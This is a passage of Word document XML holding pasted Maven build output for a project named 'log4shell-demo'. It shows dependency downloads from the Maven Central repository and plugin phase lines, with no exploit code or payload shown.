    <w:p w14:paraId="33A679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https://repo.maven.apache.org/maven2/backport-util-concurrent/backport-util-concurrent/3.1/backport-util-concurrent-3.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149D3C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https://repo.maven.apache.org/maven2/backport-util-concurrent/backport-util-concurrent/3.1/backport-util-concurrent-3.1.pom (880 B at 42 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1927C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.2.1/maven-plugin-registry-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331759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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.2.1/maven-plugin-registry-2.2.1.pom (1.9 kB at 96 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C7DE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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.2.1/maven-plugin-descriptor-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAA882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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.2.1/maven-plugin-descriptor-2.2.1.pom (2.1 kB at 103 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2835148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https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.2.1/maven-monitor-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176093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https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.2.1/maven-monitor-2.2.1.pom (1.3 kB at 63 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F10DC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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/0.1/maven-shared-utils-0.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D5E9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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/0.1/maven-shared-utils-0.1.pom (4.0 kB at 131 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E42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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/18/maven-shared-components-18.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD121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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/18/maven-shared-components-18.pom (4.9 kB at 224 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F34B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/22/maven-parent-22.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54928A6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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/22/maven-parent-22.pom (30 kB at 1.4 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D3C3F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https://repo.maven.apache.org/maven2/org/apache/apache/11/apache-11.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B10D5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https://repo.maven.apache.org/maven2/org/apache/apache/11/apache-11.pom (15 kB at 673 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD8D7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https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/2.0.1/jsr305-2.0.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDD4F1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https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/2.0.1/jsr305-2.0.1.pom (965 B at 46 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0130D6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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-java/0.9.10/plexus-java-0.9.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A8FE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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-java/0.9.10/plexus-java-0.9.10.pom (5.1 kB at 222 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734A52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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-languages/0.9.10/plexus-languages-0.9.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054DC4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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-languages/0.9.10/plexus-languages-0.9.10.pom (4.1 kB at 188 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13686A5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https://repo.maven.apache.org/maven2/org/ow2/asm/asm/6.2/asm-6.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C375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https://repo.maven.apache.org/maven2/org/ow2/asm/asm/6.2/asm-6.2.pom (2.9 kB at 109 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1083561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https://repo.maven.apache.org/maven2/org/ow2/ow2/1.5/ow2-1.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198951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https://repo.maven.apache.org/maven2/org/ow2/ow2/1.5/ow2-1.5.pom (11 kB at 535 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44036D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https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M9/qdox-2.0-M9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52970A9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https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M9/qdox-2.0-M9.pom (16 kB at 792 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077F00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https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/9/oss-parent-9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E30E1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https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/9/oss-parent-9.pom (6.6 kB at 313 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245976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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.8.4/plexus-compiler-api-2.8.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173362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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.8.4/plexus-compiler-api-2.8.4.pom (867 B at 43 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294DCF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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler/2.8.4/plexus-compiler-2.8.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29202FF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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler/2.8.4/plexus-compiler-2.8.4.pom (6.0 kB at 262 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DBCA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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/4.0/plexus-components-4.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EADE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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/4.0/plexus-components-4.0.pom (2.7 kB at 133 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516E76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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D761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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.pom (3.8 kB at 174 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D6E27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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BB4B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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom (20 kB at 1.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1452C7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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.8.4/plexus-compiler-manager-2.8.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C7C4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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.8.4/plexus-compiler-manager-2.8.4.pom (692 B at 28 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C766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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.8.4/plexus-compiler-javac-2.8.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BB9BC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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.8.4/plexus-compiler-javac-2.8.4.pom (771 B at 34 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C53BD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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compilers/2.8.4/plexus-compilers-2.8.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AC82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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compilers/2.8.4/plexus-compilers-2.8.4.pom (1.3 kB at 54 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C194D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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.0/maven-core-3.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CFCD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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.0/maven-settings-3.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0D5A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.0/maven-settings-builder-3.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374D88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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.0/maven-repository-metadata-3.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346912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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.0/maven-model-builder-3.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E07A4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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.0/maven-settings-builder-3.0.jar (38 kB at 1.4 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D69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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.0/maven-repository-metadata-3.0.jar (30 kB at 1.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572317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https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.0/maven-aether-provider-3.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78446B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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-impl/1.7/aether-impl-1.7.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E005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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.0/maven-settings-3.0.jar (47 kB at 1.4 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743925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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-spi/1.7/aether-spi-1.7.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4E82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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.0/maven-model-builder-3.0.jar (148 kB at 4.8 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F891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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-api/1.7/aether-api-1.7.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F6777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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-impl/1.7/aether-impl-1.7.jar (106 kB at 2.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1552FF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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-util/1.7/aether-util-1.7.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24A7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https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.0/maven-aether-provider-3.0.jar (51 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152EBA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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.14/plexus-interpolation-1.14.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA34D0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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-spi/1.7/aether-spi-1.7.jar (14 kB at 271 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCDC42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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-incremental/1.1/maven-shared-incremental-1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EAED1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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-api/1.7/aether-api-1.7.jar (74 kB at 1.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1697C01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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-java/0.9.10/plexus-java-0.9.10.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B1EA2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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.0/maven-core-3.0.jar (527 kB at 6.8 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026FEC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https://repo.maven.apache.org/maven2/org/ow2/asm/asm/6.2/asm-6.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADB3A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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.14/plexus-interpolation-1.14.jar (61 kB at 898 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6757812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https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M9/qdox-2.0-M9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23035B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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-incremental/1.1/maven-shared-incremental-1.1.jar (14 kB at 191 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D990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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.8.4/plexus-compiler-api-2.8.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F881F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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-java/0.9.10/plexus-java-0.9.10.jar (39 kB at 540 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C8F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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.8.4/plexus-compiler-manager-2.8.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CCBB6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https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-util/1.7/aether-util-1.7.jar (108 kB at 1.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273DED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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.8.4/plexus-compiler-javac-2.8.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC96E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https://repo.maven.apache.org/maven2/org/ow2/asm/asm/6.2/asm-6.2.jar (111 kB at 1.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AE39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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.8.4/plexus-compiler-manager-2.8.4.jar (4.7 kB at 50 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF0EA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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.8.4/plexus-compiler-javac-2.8.4.jar (21 kB at 226 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A58F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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.8.4/plexus-compiler-api-2.8.4.jar (27 kB at 279 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B136A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https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M9/qdox-2.0-M9.jar (317 kB at 2.9 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EC4C6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0E3B5A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61115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 --- maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28820D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205EAEC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6B63A6F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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69082A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9476D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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4451B6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0DC2FD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0C748E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maven-surefire-plugin:2.22.2:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7D97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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.22.2/maven-surefire-common-2.22.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632337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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.22.2/maven-surefire-common-2.22.2.pom (11 kB at 521 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590F36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https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.5.2/maven-plugin-annotations-3.5.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A1758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https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.5.2/maven-plugin-annotations-3.5.2.pom (1.6 kB at 78 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4826263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https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-tools/3.5.2/maven-plugin-tools-3.5.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A95D1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https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-tools/3.5.2/maven-plugin-tools-3.5.2.pom (15 kB at 732 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6091C43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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.22.2/surefire-api-2.22.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5321EA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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.22.2/surefire-api-2.22.2.pom (3.5 kB at 161 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573FF6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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-logger-api/2.22.2/surefire-logger-api-2.22.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD7AE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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-logger-api/2.22.2/surefire-logger-api-2.22.2.pom (2.0 kB at 93 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4F35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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.22.2/surefire-booter-2.22.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BF96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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.22.2/surefire-booter-2.22.2.pom (7.5 kB at 355 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520C7BB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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9-stable-1/plexus-container-default-1.0-alpha-9-stable-1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F257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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9-stable-1/plexus-container-default-1.0-alpha-9-stable-1.pom (3.9 kB at 188 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4325AC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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.0.3/plexus-containers-1.0.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174611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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.0.3/plexus-containers-1.0.3.pom (492 B at 23 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76282C6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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.4/plexus-1.0.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BE1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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.4/plexus-1.0.4.pom (5.7 kB at 249 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5072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https://repo.maven.apache.org/maven2/junit/junit/4.12/junit-4.12.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4438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https://repo.maven.apache.org/maven2/junit/junit/4.12/junit-4.12.pom (24 kB at 987 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6345626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https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DBE7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https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.pom (766 B at 38 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A529E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https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-parent/1.3/hamcrest-parent-1.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA7B8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https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-parent/1.3/hamcrest-parent-1.3.pom (2.0 kB at 99 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636B32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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.0.4/plexus-utils-1.0.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22905C7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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.0.4/plexus-utils-1.0.4.pom (6.9 kB at 274 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173931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https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1-alpha-2/classworlds-1.1-alpha-2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082453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https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1-alpha-2/classworlds-1.1-alpha-2.pom (3.1 kB at 130 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7491EC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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.0/maven-reporting-api-3.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1913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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.0/maven-reporting-api-3.0.pom (2.4 kB at 103 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661A57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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/15/maven-shared-components-15.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9D84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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/15/maven-shared-components-15.pom (9.3 kB at 406 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E3B4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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/16/maven-parent-16.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8C53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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/16/maven-parent-16.pom (23 kB at 1.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586EC97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https://repo.maven.apache.org/maven2/org/apache/apache/7/apache-7.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3330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https://repo.maven.apache.org/maven2/org/apache/apache/7/apache-7.pom (14 kB at 577 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDB2B2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https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1/classworlds-1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36144A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https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1/classworlds-1.1.pom (3.3 kB at 151 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4389FC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https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.2.1/maven-toolchain-2.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F991A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.2.1/maven-toolchain-2.2.1.pom (3.3 kB at 152 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA634D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https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M8/qdox-2.0-M8.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646EE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https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M8/qdox-2.0-M8.pom (16 kB at 587 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4908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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.22.2/maven-surefire-common-2.22.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE4D4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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.2.1/maven-plugin-api-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBB2B1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https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.5.2/maven-plugin-annotations-3.5.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06720E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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.22.2/surefire-api-2.22.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A0D8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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-logger-api/2.22.2/surefire-logger-api-2.22.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1596ADE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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.2.1/maven-plugin-api-2.2.1.jar (12 kB at 458 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50997B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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.22.2/surefire-booter-2.22.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2424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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-logger-api/2.22.2/surefire-logger-api-2.22.2.jar (13 kB at 580 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248DFA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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.2.1/maven-artifact-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CABE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https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.5.2/maven-plugin-annotations-3.5.2.jar (14 kB at 528 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF3FEE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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.15/plexus-utils-1.5.15.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148760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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.22.2/surefire-api-2.22.2.jar (186 kB at 4.9 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289F33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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.2.1/maven-plugin-descriptor-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8989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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.2.1/maven-artifact-2.2.1.jar (80 kB at 1.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7D43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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9-stable-1/plexus-container-default-1.0-alpha-9-stable-1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A2EA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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.2.1/maven-plugin-descriptor-2.2.1.jar (39 kB at 702 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F90B2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https://repo.maven.apache.org/maven2/junit/junit/4.12/junit-4.12.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322D8D4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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.22.2/maven-surefire-common-2.22.2.jar (528 kB at 7.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189149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https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ADB3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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.15/plexus-utils-1.5.15.jar (228 kB at 3.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACFCF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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.22.2/surefire-booter-2.22.2.jar (274 kB at 3.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716854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https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.2.1/maven-project-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A77A1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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.2.1/maven-settings-2.2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7AE7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https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar (45 kB at 489 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081CFC2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https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.2.1/maven-profile-2.2.1.jar</w:t>
      </w:r>
    </w:p>
